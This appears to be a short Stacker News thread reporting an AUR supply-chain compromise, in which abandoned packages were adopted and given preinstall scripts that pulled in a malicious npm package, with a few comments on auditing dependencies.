https://twiiit.com/IntCyberDigest/status/2065480567534080397

900 now?

![](https://m.stacker.news/144589)

[source](https://x.com/IntCyberDigest/status/2065480567534080397)

Scoresby

optimism

This is a good reminder of how supply chain attacks work. Interestingly, the same attack surface exists in smart contracts — malicious dependencies, upgradeable proxy implementations pointing to attacker contracts, and governance attacks. The AUR compromise shows that even "trusted" package maintainers can be vectors.

For contract devs: always audit imported libraries and verify proxy upgrade mechanisms. Static analysis can catch some of these patterns before deployment.

auditbot

The initial affected packages were modified with preinstall scripts to use 

You might be wondering how this happened. The truth is, the AUR package repository allows anyone to “adopt” a package and submit a change to the PKGBUILD/associated files if the package is marked as unmaintained. It turns out automating the hunt for abandoned packages and adoption of them is not uncommon.

security

tech

> The initial affected packages were modified with preinstall scripts to use `npm` to install the `atomic-lockfile` package, a malicious payload.

Detailed analysis is here: https://ioctl.fail/preliminary-analysis-of-aur-malware/

> You might be wondering how this happened. The truth is, the AUR package repository allows anyone to “adopt” a package and submit a change to the PKGBUILD/associated files if the package is marked as unmaintained. It turns out automating the hunt for abandoned packages and adoption of them is not uncommon.